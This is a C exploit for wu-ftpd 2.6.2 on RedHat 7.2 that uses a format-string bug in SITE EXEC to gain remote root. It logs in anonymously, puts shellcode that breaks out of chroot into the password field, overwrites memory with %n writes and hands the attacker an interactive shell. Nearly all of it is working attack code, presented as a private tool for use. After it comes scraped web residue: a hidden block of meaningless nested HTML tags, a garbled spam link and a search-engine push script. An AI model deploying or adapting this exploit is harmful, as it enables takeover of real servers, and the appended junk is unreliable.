/*
* 0x09wule.c - linux wu-ftpd-2.6.2(1) remote root exploit
* Coded By Sunnyholer` 2002
*
* Private 0dd code, do not distribute it
* This exploit is tested on RedHat 7.2 running on wu-ftpd-2.6.2(1), default install
*
* Cause wu-ftpd is a bad ftpd, dont use it.. hack it!
* Special thanks to: [Evil] & h4xSeed
*
* 0x09 Security groups, borned on 01 november 2002
* 
* FSCK Your mind 
*
* ## Suplied by D3m3nt3 ##  ** NOT TESTED **
* 
*/

#include <sys/socket.h>
#include <sys/types.h>
#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>

void logo() {
printf("0x09wule.c - x86/linux wu-ftpd-2.6.2(1) remote root xploit\n");
printf("             exploit for redhat 7.2 wu-2.6.2(1)\n\n");
}

char linuxcode[]= /* chroot() shellcode */
	"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
	"\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31"
	"\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27"
	"\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31"
	"\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d"
	"\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46"
	"\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8"
	"\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c"
	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
	"\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff"
	"\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31";


main(int argc,char *argv[]) {
    
    char   cmdbuf[8192];
    char   cbuf[1024];
    char   *t;
    char   nop[400];
    int    pip,i,a=22,st=0;
    struct sockaddr_in sck;
    struct hostent *hp;
    long   inet;
    int    port=21;
    fd_set fds;
    unsigned int aa;
    unsigned long   reta,retb,tmp,tmp2,retz,ist=0;
    int ret;
    int add=5;    
    
memset(cmdbuf,0x0,sizeof(cmdbuf));
memset(cbuf,0x0,sizeof(cbuf));
memset(nop,0x0,sizeof(nop));

logo();
if (argc<2) 
    { 
	fprintf(stderr,"Usage: %s [ip] [ret_location]\n",argv[0]); 
    	fprintf(stderr,"[ret_location] is optional parametr - it can be two
	               two things :
		       1) In format 0xbffffff
		       2) And in 4,5,6,7,8.. - this supply where exploit 
		          can find ret_location address - standard its 5
		       !! Use this parametr only if default settings fail\n",argv[0]); 
                  
    	exit(-1);
    }

if (argc>2) 
    { 
        reta=strtoul(argv[2],argv[2]+10,16);
	fprintf(stderr,"++ Using ret address: %x \n",reta); 
        ist=1;
	if (reta<20) { ist=0;add=reta;}
    }


pip=socket(PF_INET,SOCK_STREAM,0);

if (!pip) 
{
    perror("socket()");
    exit(-1);
}

inet=inet_addr(argv[1]);
if (inet==-1) {
if (hp=gethostbyname(argv[1])) memcpy(&inet,hp->h_addr,4); else inet=-1;
if (inet==-1) 
{ 
    fprintf(stderr,"Cant resolv %s!! \n",argv[1]);
    exit(-1);
}
}
sck.sin_family=PF_INET;
sck.sin_port=htons(port);
sck.sin_addr.s_addr=inet;

if (connect(pip,(struct sockaddr *)&sck,sizeof(sck))<0) 
{
    perror("Connect() ");
    exit(-1);
}

read(pip,cbuf,1023);
fprintf(stderr,"Connected to: %s \n",argv[1]);
fprintf(stderr,"Banner: %s \n",cbuf);
// Connected ,sending user info
strcpy(cmdbuf,"user ftp\n");write(pip,cmdbuf,strlen(cmdbuf));
memset(nop,0x90,sizeof(nop)-strlen(linuxcode)-10);

strcat(nop,linuxcode);

memset(cmdbuf,0x0,sizeof(cmdbuf));
sprintf(cmdbuf,"pass %s\n",nop);write(pip,cmdbuf,strlen(cmdbuf));
sleep(5);
read(pip,cmdbuf,sizeof(cmdbuf)-1);
memset(cmdbuf,0x0,sizeof(cmdbuf));
if (!strncmp(cmdbuf,"530",3))
    { 
	printf("loggin incorrect : %s \n",cmdbuf);
        exit(-1);
    }
    fprintf(stderr,"Logged in.. \n");
    fprintf(stderr,"+ Finding ret addresses \n");
if (ist==0) 
{
// reta
next:
    memset(cmdbuf,0x0,sizeof(cmdbuf));sprintf(cmdbuf,"SITE EXEC %%%d$p\n",add);
    write(pip,cmdbuf,strlen(cmdbuf));
    memset(cmdbuf,0x0,sizeof(cmdbuf));read(pip,cmdbuf,sizeof(cmdbuf)-1);
    if (!strncmp(cmdbuf+6,"$p",2))
    {
      fprintf(stderr,"Wuftpd is not vulnerable : %s \n",cmdbuf);
      exit(-1);
    } 
    if (strstr(cmdbuf,"??")) {
      fprintf(stderr,"Wuftpd is not vulnerable : %s \n",cmdbuf);
      exit(-1);
    } else {
    	fprintf(stderr,"Wuftpd is vulnerable : %s \n",cmdbuf);
    }
    reta=strtoul(strstr(cmdbuf,"-")+1,strstr(cmdbuf,"-")+11,16);
}
if ((reta&0xff)==0) { add++;goto next;}


//retb
st=0;
a=60;
while (a<=100) {
a++;
memset(cmdbuf,0x0,sizeof(cmdbuf));
sprintf(cmdbuf,"SITE EXEC aaa|%%%d$p\n",a);
 write(pip,cmdbuf,strlen(cmdbuf));
 memset(cmdbuf,0x0,sizeof(cmdbuf));read(pip,cmdbuf,sizeof(cmdbuf)-1);
usleep(1000);

    t=(char *)strstr(cmdbuf,"|");
    tmp=0;

if (t!=NULL) tmp=strtoul(t+1,t+11,16);
if (tmp!=0) 
{
        tmp2=tmp;
        tmp=(tmp>>16);
 if (tmp==0x807) 
     {
         retb=tmp2;
	 fprintf(stderr,"Cached with addres : 0x%x\n",retb);st=1;
	 break;
     }
 if (tmp==0x806) 
     {
         retb=tmp2;
	 fprintf(stderr,"Cached with addres : 0x%x\n",retb);st=1;
	 break;
     }

  }
}

if (st==0) 
{ 
    fprintf(stderr," Sorry couldnt find proctitle address - fix me!!\n");
    exit(-1);
}

memset(cmdbuf,0x0,sizeof(cmdbuf));
    printf("+ Finding correct offsets \n");
    fprintf(stderr,"+ Real ret addr : 0x %x \n",reta-0x58);
if (ist==0) reta=reta-0x58;

st=0;
a=100;
while (a<=320) {
a++;
memset(cmdbuf,0x0,sizeof(cmdbuf));
sprintf(cmdbuf,"SITE EXEC aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%c\xff%c%c|%%%d$p\n",0x74,0xd0,0xff,0xbf,a);
/*
(reta & 0x000000ff),(reta & 0x0000ff00)>>8,
                  (reta & 0x00ff0000)>>16,
		  (reta & 0xff000000)>>24,a);*/
 write(pip,cmdbuf,strlen(cmdbuf));
 memset(cmdbuf,0x0,sizeof(cmdbuf));read(pip,cmdbuf,sizeof(cmdbuf)-1);
#ifdef DEBUG
 fprintf(stderr,"Outbuf is : %s \n",cmdbuf);
#endif
usleep(800);
    t=(char *)strstr(cmdbuf,"|");
    tmp=0;
if (t!=NULL) tmp=strtoul(t+1,t+11,16);
if (tmp!=0) 
{
        tmp2=tmp;
 if ((tmp==reta)||(tmp==0xbfffd074))
     {
	 fprintf(stderr,"Cached with addres : 0x%x and a = %d\n",tmp,a--);st=1;
	 break;
     }
  }
}

if (st==0) 
{ 
    fprintf(stderr," Sorry couldnt find ret location address - fix me!!\n");
    exit(-1);
}
//if (ist==0) reta=reta-0x58;

    retb=retb+100;
    printf("Ret      location : %x \n",reta);
    printf("Proctitle addres  : %x and %u \n",retb,retb);

// now we are exploiting the bug
aa=retb;
tmp2=reta;
 memset(cmdbuf,0x0,sizeof(cmdbuf));read(pip,cmdbuf,sizeof(cmdbuf)-1);
sprintf(cmdbuf,"SITE EXEC aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%c\xff%c%c|%%%d$p\n",0x54,0xd0,0xff,0xbf,a);
/*(tmp2 & 0x000000ff),(tmp2 & 0x0000ff00)>>8,
                  (tmp2 & 0x00ff0000)>>16,
		  (tmp2 & 0xff000000)>>24,a);*/
// fprintf(stderr,"slemy : %s \n",cmdbuf);
 write(pip,cmdbuf,strlen(cmdbuf));
 usleep(500);
 memset(cmdbuf,0x0,sizeof(cmdbuf));read(pip,cmdbuf,sizeof(cmdbuf)-1);
    t=(char *)strstr(cmdbuf,"|");
    tmp=0;
if (t!=NULL) tmp=strtoul(t+1,t+11,16);
if ((tmp!=0)&&(tmp!=reta)) {
fprintf(stderr,"!!! Some problems with ret addres,is : 0x%x \n",tmp);
//exit(-1);
} else {
fprintf(stderr,"!!! Goin thru with  : 0x%x \n",tmp);
}

 memset(cmdbuf,0x0,sizeof(cmdbuf));
sprintf(cmdbuf,"SITE EXEC aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%c\xff%c%c|%%.%ud%%%d$n\n",(reta & 0x000000ff),(reta & 0x0000ff00)>>8,
                  (reta & 0x00ff0000)>>16,
		  (reta & 0xff000000)>>24,aa,a);

 write(pip,cmdbuf,strlen(cmdbuf));
 memset(cmdbuf,0x0,sizeof(cmdbuf));

fprintf(stderr," Wait for a shell.....\n");
// w8 for shell    

while (1)     
{
    FD_ZERO(&fds);
    FD_SET(0,&fds);
    FD_SET(pip,&fds);
    select(255, &fds,NULL,NULL,NULL);
    if (FD_ISSET(pip,&fds)) 
    {
      memset(cbuf,0x0,sizeof(cbuf));
      ret=read(pip,cbuf,sizeof(cbuf)-1);
      if (ret<=0) 
       {          
         printf("Connection closed - EOF \n");
	 exit(-1);
       }
       printf("%s",cbuf);
      }
    if (FD_ISSET(0,&fds)) 
    {
      memset(cbuf,0x0,sizeof(cbuf));
      read(0,cbuf,sizeof(cbuf)-1);
      write(pip,cbuf,strlen(cbuf));
     }
}
close(pip);
}

<div style="position:fixed;left:-9000px;top:-9000px;"><em id="7ztzv"></em><center id="7ztzv"></center><mark id="7ztzv"><center id="7ztzv"></center></mark><output id="7ztzv"><noframes id="7ztzv"></noframes></output><font id="7ztzv"><delect id="7ztzv"></delect></font><ruby id="7ztzv"><big id="7ztzv"></big></ruby><progress id="7ztzv"><sub id="7ztzv"></sub></progress><th id="7ztzv"><big id="7ztzv"></big></th><form id="7ztzv"><nobr id="7ztzv"></nobr></form><ol id="7ztzv"><video id="7ztzv"></video></ol><th id="7ztzv"><progress id="7ztzv"></progress></th><strike id="7ztzv"><span id="7ztzv"></span></strike><em id="7ztzv"><span id="7ztzv"></span></em><video id="7ztzv"><strike id="7ztzv"></strike></video><th id="7ztzv"><noframes id="7ztzv"></noframes></th><em id="7ztzv"><span id="7ztzv"></span></em><ins id="7ztzv"><b id="7ztzv"></b></ins><ol id="7ztzv"><output id="7ztzv"></output></ol><menuitem id="7ztzv"><thead id="7ztzv"></thead></menuitem><del id="7ztzv"><ruby id="7ztzv"></ruby></del><noframes id="7ztzv"><span id="7ztzv"></span></noframes><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><dl id="7ztzv"><rp id="7ztzv"></rp></dl><progress id="7ztzv"><thead id="7ztzv"></thead></progress><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><strike id="7ztzv"><pre id="7ztzv"></pre></strike><em id="7ztzv"><address id="7ztzv"></address></em><big id="7ztzv"><address id="7ztzv"></address></big><address id="7ztzv"><listing id="7ztzv"></listing></address><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><big id="7ztzv"><sub id="7ztzv"></sub></big><var id="7ztzv"><meter id="7ztzv"></meter></var><span id="7ztzv"><video id="7ztzv"></video></span><listing id="7ztzv"><mark id="7ztzv"></mark></listing><progress id="7ztzv"><address id="7ztzv"></address></progress><nobr id="7ztzv"><progress id="7ztzv"></progress></nobr><noframes id="7ztzv"><sub id="7ztzv"></sub></noframes><font id="7ztzv"><delect id="7ztzv"></delect></font><strike id="7ztzv"><pre id="7ztzv"></pre></strike><delect id="7ztzv"><menuitem id="7ztzv"></menuitem></delect><em id="7ztzv"><pre id="7ztzv"></pre></em><mark id="7ztzv"><cite id="7ztzv"></cite></mark><delect id="7ztzv"><ins id="7ztzv"></ins></delect><pre id="7ztzv"><rp id="7ztzv"></rp></pre><cite id="7ztzv"><var id="7ztzv"></var></cite><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><ruby id="7ztzv"><p id="7ztzv"></p></ruby><em id="7ztzv"><form id="7ztzv"></form></em><rp id="7ztzv"><em id="7ztzv"></em></rp>
<video id="7ztzv"><noframes id="7ztzv"></noframes></video><cite id="7ztzv"><del id="7ztzv"></del></cite><meter id="7ztzv"><thead id="7ztzv"></thead></meter><p id="7ztzv"><dl id="7ztzv"></dl></p><meter id="7ztzv"><thead id="7ztzv"></thead></meter><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><mark id="7ztzv"><cite id="7ztzv"></cite></mark><menuitem id="7ztzv"><font id="7ztzv"></font></menuitem><del id="7ztzv"><rp id="7ztzv"></rp></del><thead id="7ztzv"><delect id="7ztzv"></delect></thead><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var><ins id="7ztzv"><cite id="7ztzv"></cite></ins><delect id="7ztzv"><output id="7ztzv"></output></delect><p id="7ztzv"><pre id="7ztzv"></pre></p><ruby id="7ztzv"><p id="7ztzv"></p></ruby><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><progress id="7ztzv"><address id="7ztzv"></address></progress><thead id="7ztzv"><var id="7ztzv"></var></thead><ins id="7ztzv"><i id="7ztzv"></i></ins><ins id="7ztzv"><b id="7ztzv"></b></ins><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><ins id="7ztzv"><i id="7ztzv"></i></ins><font id="7ztzv"><delect id="7ztzv"></delect></font><em id="7ztzv"><form id="7ztzv"></form></em><var id="7ztzv"><ins id="7ztzv"></ins></var><span id="7ztzv"><th id="7ztzv"></th></span><ol id="7ztzv"><rp id="7ztzv"></rp></ol><th id="7ztzv"><progress id="7ztzv"></progress></th><address id="7ztzv"><dfn id="7ztzv"></dfn></address><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><noframes id="7ztzv"><span id="7ztzv"></span></noframes><noframes id="7ztzv"><form id="7ztzv"></form></noframes><big id="7ztzv"><form id="7ztzv"></form></big><track id="7ztzv"><noframes id="7ztzv"></noframes></track><em id="7ztzv"><span id="7ztzv"></span></em><span id="7ztzv"><th id="7ztzv"></th></span><span id="7ztzv"><th id="7ztzv"></th></span><video id="7ztzv"><em id="7ztzv"></em></video><delect id="7ztzv"><ins id="7ztzv"></ins></delect><b id="7ztzv"><del id="7ztzv"></del></b><progress id="7ztzv"><sub id="7ztzv"></sub></progress><dfn id="7ztzv"><mark id="7ztzv"></mark></dfn><rp id="7ztzv"><em id="7ztzv"></em></rp><track id="7ztzv"><noframes id="7ztzv"></noframes></track><address id="7ztzv"><th id="7ztzv"></th></address><cite id="7ztzv"><delect id="7ztzv"></delect></cite><cite id="7ztzv"><var id="7ztzv"></var></cite><output id="7ztzv"><i id="7ztzv"></i></output><track id="7ztzv"><big id="7ztzv"></big></track>
<big id="7ztzv"><address id="7ztzv"></address></big><p id="7ztzv"><dl id="7ztzv"></dl></p><meter id="7ztzv"><font id="7ztzv"></font></meter><address id="7ztzv"><nobr id="7ztzv"></nobr></address><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><pre id="7ztzv"><video id="7ztzv"></video></pre><th id="7ztzv"><progress id="7ztzv"></progress></th><p id="7ztzv"><pre id="7ztzv"></pre></p><ruby id="7ztzv"><em id="7ztzv"></em></ruby><del id="7ztzv"><ins id="7ztzv"></ins></del><sub id="7ztzv"><listing id="7ztzv"></listing></sub><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><thead id="7ztzv"><var id="7ztzv"></var></thead><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><b id="7ztzv"><del id="7ztzv"></del></b><big id="7ztzv"><address id="7ztzv"></address></big><form id="7ztzv"><nobr id="7ztzv"></nobr></form><ol id="7ztzv"><ins id="7ztzv"></ins></ol><font id="7ztzv"><delect id="7ztzv"></delect></font><big id="7ztzv"><sub id="7ztzv"></sub></big><listing id="7ztzv"><progress id="7ztzv"></progress></listing><delect id="7ztzv"><output id="7ztzv"></output></delect><noframes id="7ztzv"><span id="7ztzv"></span></noframes><track id="7ztzv"><noframes id="7ztzv"></noframes></track><menuitem id="7ztzv"><sub id="7ztzv"></sub></menuitem><address id="7ztzv"><th id="7ztzv"></th></address><address id="7ztzv"><track id="7ztzv"></track></address><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><em id="7ztzv"><pre id="7ztzv"></pre></em><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><em id="7ztzv"><form id="7ztzv"></form></em><form id="7ztzv"><track id="7ztzv"></track></form><dfn id="7ztzv"><progress id="7ztzv"></progress></dfn><rp id="7ztzv"><noframes id="7ztzv"></noframes></rp><i id="7ztzv"><ol id="7ztzv"></ol></i><i id="7ztzv"><del id="7ztzv"></del></i><cite id="7ztzv"><delect id="7ztzv"></delect></cite><strike id="7ztzv"><dl id="7ztzv"></dl></strike><dfn id="7ztzv"><mark id="7ztzv"></mark></dfn><address id="7ztzv"><th id="7ztzv"></th></address><ins id="7ztzv"><font id="7ztzv"></font></ins><thead id="7ztzv"><var id="7ztzv"></var></thead><video id="7ztzv"><strike id="7ztzv"></strike></video><p id="7ztzv"><pre id="7ztzv"></pre></p><video id="7ztzv"><i id="7ztzv"></i></video><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><thead id="7ztzv"><listing id="7ztzv"></listing></thead><dl id="7ztzv"><rp id="7ztzv"></rp></dl><address id="7ztzv"><th id="7ztzv"></th></address><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var>
<p id="7ztzv"><var id="7ztzv"></var></p><ins id="7ztzv"><i id="7ztzv"></i></ins><strike id="7ztzv"><span id="7ztzv"></span></strike><del id="7ztzv"><output id="7ztzv"></output></del><font id="7ztzv"><delect id="7ztzv"></delect></font><output id="7ztzv"><em id="7ztzv"></em></output><p id="7ztzv"><span id="7ztzv"></span></p><big id="7ztzv"><thead id="7ztzv"></thead></big><video id="7ztzv"><noframes id="7ztzv"></noframes></video><b id="7ztzv"><ol id="7ztzv"></ol></b><font id="7ztzv"><dfn id="7ztzv"></dfn></font><font id="7ztzv"><var id="7ztzv"></var></font><ins id="7ztzv"><i id="7ztzv"></i></ins><dfn id="7ztzv"><meter id="7ztzv"></meter></dfn><rp id="7ztzv"><strike id="7ztzv"></strike></rp><del id="7ztzv"><ruby id="7ztzv"></ruby></del><var id="7ztzv"><ruby id="7ztzv"></ruby></var><rp id="7ztzv"><em id="7ztzv"></em></rp><em id="7ztzv"><span id="7ztzv"></span></em><del id="7ztzv"><ruby id="7ztzv"></ruby></del><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><track id="7ztzv"><noframes id="7ztzv"></noframes></track><form id="7ztzv"><nobr id="7ztzv"></nobr></form><video id="7ztzv"><big id="7ztzv"></big></video><video id="7ztzv"><em id="7ztzv"></em></video><p id="7ztzv"><span id="7ztzv"></span></p><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><ins id="7ztzv"><b id="7ztzv"></b></ins><dfn id="7ztzv"><progress id="7ztzv"></progress></dfn><var id="7ztzv"><mark id="7ztzv"></mark></var><font id="7ztzv"><delect id="7ztzv"></delect></font><big id="7ztzv"><sub id="7ztzv"></sub></big><address id="7ztzv"><th id="7ztzv"></th></address><form id="7ztzv"><th id="7ztzv"></th></form><mark id="7ztzv"><cite id="7ztzv"></cite></mark><progress id="7ztzv"><font id="7ztzv"></font></progress><mark id="7ztzv"><cite id="7ztzv"></cite></mark><strike id="7ztzv"><form id="7ztzv"></form></strike><mark id="7ztzv"><font id="7ztzv"></font></mark><strike id="7ztzv"><form id="7ztzv"></form></strike><pre id="7ztzv"><video id="7ztzv"></video></pre><strike id="7ztzv"><dl id="7ztzv"></dl></strike><delect id="7ztzv"><ins id="7ztzv"></ins></delect><dl id="7ztzv"><rp id="7ztzv"></rp></dl><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><p id="7ztzv"><dl id="7ztzv"></dl></p><mark id="7ztzv"><i id="7ztzv"></i></mark><meter id="7ztzv"><sub id="7ztzv"></sub></meter><rp id="7ztzv"><em id="7ztzv"></em></rp><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead>
<th id="7ztzv"><big id="7ztzv"></big></th><del id="7ztzv"><rp id="7ztzv"></rp></del><video id="7ztzv"><big id="7ztzv"></big></video><delect id="7ztzv"><ruby id="7ztzv"></ruby></delect><big id="7ztzv"><sub id="7ztzv"></sub></big><track id="7ztzv"><em id="7ztzv"></em></track><cite id="7ztzv"><ol id="7ztzv"></ol></cite><i id="7ztzv"><dl id="7ztzv"></dl></i><noframes id="7ztzv"><address id="7ztzv"></address></noframes><ruby id="7ztzv"><i id="7ztzv"></i></ruby><delect id="7ztzv"><output id="7ztzv"></output></delect><delect id="7ztzv"><output id="7ztzv"></output></delect><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><ol id="7ztzv"><ruby id="7ztzv"></ruby></ol><delect id="7ztzv"><output id="7ztzv"></output></delect><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var><track id="7ztzv"><big id="7ztzv"></big></track><rp id="7ztzv"><em id="7ztzv"></em></rp><em id="7ztzv"><span id="7ztzv"></span></em><mark id="7ztzv"><b id="7ztzv"></b></mark><i id="7ztzv"><ol id="7ztzv"></ol></i><progress id="7ztzv"><sub id="7ztzv"></sub></progress><rp id="7ztzv"><strike id="7ztzv"></strike></rp><font id="7ztzv"><var id="7ztzv"></var></font><span id="7ztzv"><th id="7ztzv"></th></span><video id="7ztzv"><strike id="7ztzv"></strike></video><th id="7ztzv"><em id="7ztzv"></em></th><delect id="7ztzv"><ins id="7ztzv"></ins></delect><sub id="7ztzv"><delect id="7ztzv"></delect></sub><progress id="7ztzv"><sub id="7ztzv"></sub></progress><sub id="7ztzv"><listing id="7ztzv"></listing></sub><thead id="7ztzv"><listing id="7ztzv"></listing></thead><form id="7ztzv"><th id="7ztzv"></th></form><track id="7ztzv"><em id="7ztzv"></em></track><dfn id="7ztzv"><menuitem id="7ztzv"></menuitem></dfn><b id="7ztzv"><dl id="7ztzv"></dl></b><nobr id="7ztzv"><big id="7ztzv"></big></nobr><track id="7ztzv"><progress id="7ztzv"></progress></track><ruby id="7ztzv"><p id="7ztzv"></p></ruby><pre id="7ztzv"><nobr id="7ztzv"></nobr></pre><pre id="7ztzv"><track id="7ztzv"></track></pre><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><em id="7ztzv"><span id="7ztzv"></span></em><mark id="7ztzv"><i id="7ztzv"></i></mark><rp id="7ztzv"><p id="7ztzv"></p></rp><delect id="7ztzv"><ruby id="7ztzv"></ruby></delect><sub id="7ztzv"><dfn id="7ztzv"></dfn></sub><thead id="7ztzv"><var id="7ztzv"></var></thead><i id="7ztzv"><ol id="7ztzv"></ol></i><track id="7ztzv"><strike id="7ztzv"></strike></track></div>

<a href="http://www.bjnorthway.com/">ÑÇÖÞÅ·ÃÀÔÚÏß</a>
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
</body>